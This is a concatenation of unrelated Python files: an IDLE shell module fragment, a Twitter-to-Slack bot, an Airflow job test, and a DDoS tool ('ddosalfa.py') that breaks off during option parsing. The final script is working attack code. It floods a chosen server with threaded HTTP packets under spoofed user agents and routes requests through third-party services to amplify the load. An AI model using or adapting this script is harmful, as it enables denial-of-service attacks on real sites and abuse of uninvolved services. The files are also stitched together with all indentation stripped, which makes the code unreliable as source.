OutputWindow.__init__(self, flist, None, None)
#
import __builtin__
__builtin__.quit = __builtin__.exit = "To exit, type Ctrl-D."
#
self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<beginning-of-line>>", self.home_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<open-python-shell>>", self.flist.open_shell)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
if use_subprocess:
self.interp.start_subprocess()
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response == False:
return "cancel"
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None
def interact(self):
self.begin()
self.top.mainloop()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
return ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if self.reading:
self.top.quit()
elif (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def home_callback(self, event):
if event.state != 0 and event.keysym == "Home":
return # <Modifier-Home>; fall back to class binding
if self.text.compare("iomark", "<=", "insert") and \
self.text.compare("insert linestart", "<=", "iomark"):
self.text.mark_set("insert", "iomark")
self.text.tag_remove("sel", "1.0", "end")
self.text.see("insert")
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if it is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]))
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]))
return "break"
# No stdin mark -- just get the current line, less any prompt
line = self.text.get("insert linestart", "insert lineend")
last_line_of_prompt = sys.ps1.split('\n')[-1]
if line.startswith(last_line_of_prompt):
line = line[len(last_line_of_prompt):]
self.recall(line)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s):
if self.history:
self.history.recall(s)
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile:
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
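# Hedged sketch (illustrative, not part of IDLE): anything with a write()
# method can stand in for sys.stdout, which is how PseudoFile routes print
# output into the shell widget. Assuming a PyShell instance `shell`:
def _redirect_demo(shell):
saved = sys.stdout
sys.stdout = PseudoFile(shell, "stdout")
try:
print "hello" # lands in shell.write("hello\n", "stdout")
finally:
sys.stdout = saved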
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
flist.open_shell()
elif enable_shell:
flist.pyshell = PyShell(flist)
flist.pyshell.begin()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %s
del _sys
\n""" % `sys.argv`)
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
def display_port_binding_error():
print """\
\nIDLE cannot run.
IDLE needs to use a specific TCP/IP port (8833) in order to communicate with
its Python execution server. IDLE is unable to bind to this port, and so
cannot start. Here are some possible causes of this problem:
1. TCP/IP networking is not installed or not working on this computer
2. Another program (another IDLE?) is running that uses this port
3. Personal firewall software is preventing IDLE from using this port
Run IDLE with the -n command line switch to start without a subprocess
and refer to Help/IDLE Help "Running without a subprocess" for further
details.
"""
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
twitter.py | import sys
import os
import time
from queue import Queue
from threading import Thread
from tweepy import Stream
import tweepy
import db as db
import slack as slack
import yaml
from watchgod import run_process, watch
from watchgod.watcher import DefaultDirWatcher
from http.client import IncompleteRead as http_incompleteRead
from urllib3.exceptions import IncompleteRead as urllib3_incompleteRead
import logging
logging.basicConfig(filename='twitter.log',
format='%(asctime)s TWITTER %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
try:
config = yaml.safe_load(open('config.yaml'))
except yaml.YAMLError as exc:
print(exc)
TWITTER_CONSUMER_KEY = os.environ['TWITTER_CONSUMER_KEY']
TWITTER_CONSUMER_SECRET = os.environ['TWITTER_CONSUMER_SECRET']
TWITTER_ACCESS_TOKEN = os.environ['TWITTER_ACCESS_TOKEN']
TWITTER_ACCESS_TOKEN_SECRET = os.environ['TWITTER_ACCESS_TOKEN_SECRET']
POST_CHANNEL = config['channel']
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_ACCESS_TOKEN_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
# Create custom Classes #######################################################
class CSVWatcher(DefaultDirWatcher):
def should_watch_file(self, entry):
return entry.name.endswith(('.csv',))
class CustTweepyStream(Stream):
"""Custom Stream usable in contexts"""
def finalize(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
self.finalize()
def __enter__(self):
return self
# Brute force filtering functions #############################################
def filter_tweets_by_word(status):
"""Brute-force search"""
flag = False
# search tweet text
for word in db.get_keywords():
for w in status.text.split():
if word == w:
flag = True
# search quote tweet text
if hasattr(status, "quoted_status"):
for word in db.get_keywords():
for w in status.quoted_status.text.split():
if word == w:
flag = True
# search retweet text
if hasattr(status, "retweeted_status"):
for word in db.get_keywords():
for w in status.retweeted_status.text.split():
if word == w:
flag = True
return flag
def filter_tweets_by_user(twitter_user):
"""Brute-force search"""
flag = False
for user in db.get_users():
if user == '@' + str(twitter_user):
flag = True
return flag
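# Hedged aside (not from the original): the two brute-force scans above are
# equivalent to a set intersection over whitespace-separated tokens, which
# avoids the nested loops. A minimal sketch:
def keywords_in_text(text, keywords):
"""True if any keyword appears as an exact whitespace-separated token."""
return bool(set(text.split()) & set(keywords))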
###############################################################################
def preprocess_text(status):
"""
convert extended tweets text and full text tweets
to something our template can handle
"""
if hasattr(status, "full_text"):
status.text = status.full_text
if hasattr(status, "extended_tweet"):
status.text = status.extended_tweet["full_text"]
if hasattr(status, "quoted_status"):
if hasattr(status.quoted_status, "full_text"):
status.quoted_status.text = status.quoted_status.full_text
if hasattr(status, "retweeted_status"):
if hasattr(status.retweeted_status, "full_text"):
status.retweeted_status.text = status.retweeted_status.full_text
return status
#override tweepy.StreamListener to add logic to on_status
class MyStreamListener(tweepy.StreamListener):
def __init__(self, channel='bot-dev', q=None):
super(MyStreamListener,self).__init__()
self.channel = channel
# create a queue for tweet data
num_worker_threads = 4
self.q = q if q is not None else Queue() # avoid sharing a mutable default queue across instances
for i in range(num_worker_threads):
t = Thread(target=self.process_status)
t.daemon = True
t.start()
def on_status(self, status):
#store status in the queue
self.q.put(status)
return True
def process_status(self):
"""Handle tweet data"""
# return false to stop the stream and close the connection
while True:
status = self.q.get()
try:
logging.info("Got a tweet!")
status = preprocess_text(status)
# parse for authors
if filter_tweets_by_user(status.user.screen_name):
logging.info("found an author match")
# parse for keywords
if filter_tweets_by_word(status):
logging.info("found a text match!")
# filter out reply tweets
if status.in_reply_to_status_id is None:
slack.write_block(slack.build_message(status),
user_icon=status.user.profile_image_url,
channel=self.channel)
# Check for an error Tweepy encounters every ~1 day or so.
# This is likely caused by the process_status function falling
# behind the stream and should be fixed with the use of a queue
# but we can still check for these errors for now.
# https://github.com/tweepy/tweepy/issues/908
# https://github.com/tweepy/tweepy/issues/237
except http_incompleteRead as e:
logging.error("http.client Incomplete Read error: %s" % str(e))
logging.error("~~~ Restarting stream search in 5 seconds... ~~~")
time.sleep(5)
continue
except urllib3_incompleteRead as e:
logging.error("urllib3 Incomplete Read error: %s" % str(e))
logging.error("~~~ Restarting stream search in 5 seconds... ~~~")
time.sleep(5)
continue
except BaseException as e:
# the catch-all must come last, or it would swallow the handlers above
logging.error("Error on_data: %s, Pausing..." % str(e))
time.sleep(5)
continue
self.q.task_done()
return True
def on_error(self, status_code):
"""Handle HTTP errors from Twitter"""
with self.q.mutex: # thread safe
# clear any queued tweets on error (Queue has no clear(); use the inner deque)
self.q.queue.clear()
logging.error("Received error code: {}".format(status_code))
if status_code == 420:
# request rate limit
logging.warning("API rate limited!! Waiting 60s and will try to restart")
time.sleep(60)
bot_stream, bot_listener = launch_bot()
for changes in watch(os.path.abspath('.'), watcher_cls=CSVWatcher):
print(changes)
bot_stream, bot_listener = restart_bot(bot_stream, bot_listener)
return False
def get_ids():
"""Helper to get Twitter id numbers from user handles"""
users = db.get_users()
ids = []
for user in users:
ids.append(str(api.get_user(screen_name = user).id))
return ids
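# Note: each get_user() call is a separate REST request; wait_on_rate_limit=True
# above makes these calls block instead of fail if Twitter throttles them.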
def launch_bot(channel=POST_CHANNEL):
"""
Start the stream and filter for users in the db list.
All other filtering is done by the Listener.
"""
logging.info("Creating listener...")
myStreamListener = MyStreamListener(channel=channel)
myStream = CustTweepyStream(auth = api.auth,
listener=myStreamListener,
include_entities=True,
tweet_mode = 'extended')
# start filtering
logging.info("Starting bot...")
# async needs to be true so we don't block the file watcher
# stall_warnings would flag when tweets arrive too fast; disabled here
myStream.filter(follow=get_ids(), is_async=True, stall_warnings=False)
return myStream, myStreamListener
def restart_bot(stream, listener):
# try to kill previous stream
logging.info("Restarting bot stream!")
# https://stackoverflow.com/questions/38560760/python-clear-items-from-priorityqueue
# clear the queue on error
logging.info("Killing threads..")
# with listener.q.mutex: # thread safe never seemed to work
while not listener.q.empty():
print("in loop")
try:
listener.q.get(block=False) # timeout is ignored when block is False
except:
continue
listener.q.task_done()
logging.info("Disconnecting from stream")
stream.disconnect()
# return a new stream but wait some time to avoid rate limiting
logging.info("Waiting 60s to reconnect...")
time.sleep(60)
return launch_bot()
if __name__ == '__main__':
dev_mode = False # set True to print file-change events
# run the bot watching for file changes using CSVWatcher
bot_stream, bot_listener = launch_bot()
for changes in watch(os.path.abspath('.'), watcher_cls=CSVWatcher):
if dev_mode:
print(changes)
bot_stream, bot_listener = restart_bot(bot_stream, bot_listener)
|
test_local_task_job.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import time
import unittest
from airflow import AirflowException, models, settings
from airflow.configuration import conf
from airflow.executors import SequentialExecutor
from airflow.jobs import LocalTaskJob
from airflow.models import DAG, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import timezone
from airflow.utils.db import create_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from tests.compat import patch
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
heartbeat_records = []
def heartbeat_recorder():
heartbeat_records.append(timezone.utcnow())
with create_session() as session:
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=TestExecutor(do_update=False))
job.heartrate = 2
job.heartbeat = heartbeat_recorder
job._execute()
self.assertGreater(len(heartbeat_records), 1)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
self.assertGreaterEqual((time2 - time1).total_seconds(), job.heartrate)
@unittest.skipIf('mysql' in conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
|
ddosalfa.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# DDos cru Alfa v1.0
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Raw DDoS bot running, use : python ddosalfa.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port, default 80
-t : turbo, default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
